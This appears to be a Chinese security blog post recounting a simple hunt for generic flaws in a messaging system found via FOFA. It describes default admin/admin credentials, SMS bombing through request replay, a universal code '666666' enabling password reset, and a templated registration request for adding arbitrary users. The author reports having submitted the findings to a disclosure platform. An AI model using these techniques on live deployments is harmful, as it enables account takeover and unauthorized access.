一次简单通用漏洞挖掘
一次简单通用漏洞挖掘
原创 青春计协 青春计协 2024-09-14 15:25
GRADUATION
点击蓝字 关注我们
前言:
挺久没挖洞了,打算看一下工作这边的软件公司有无通用系统,fofa随意搜索了一家发现有个类似钉钉这类的通讯系统,资产还挺多的,因为时间问题就简单测了一下逻辑漏洞;
信息收集:
通过用户手册,直接知道了后台的管理地址,以及默认的用户名和密码等信息;
漏洞测试:
A、弱口令漏洞:
直接使用admin和admin即可进入后台管理系统;
B、短信轰炸漏洞:
直接“注册”用户,输入手机号或者邮箱获取验证码,BurpSuite抓包获取验证码的数据包,不断发送即可接收到验证码信息;(备注:这里实际获取验证码有点问题,无法收到)
C、万能验证码:
直接使用“666666”验证码即可跳转到下一步设置昵称、密码等信息;
D、任意密码重置:
选择“忘记密码”输入手机号或者邮箱获取验证码,输入:666666即可跳转到下一步直接设置新密码;
E、任意用户添加:
BurpSuite获取该数据包,替换其中内容即可;
POST /account/register HTTP/1.1
Host:
Content-Length: 186
Accept: application/json, text/plain, */*
operationID:
User-Agent:
Content-Type: application/json
Origin:
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
{"verifyCode":"666666","autoLogin":true,"user":{"nickname":"替换","faceURL":"","areaCode":"+86","phoneNumber":"替换","password":"替换(MD5值)"}}
数据包
小总结:本次漏洞挖掘难度较低,技术含量不高,主要给上次的验证码文章做个实战漏洞挖掘演示;
(补天漏洞响应平台审核速度蛮快的的,很加分!)
编辑|青春计协
审核|青春计协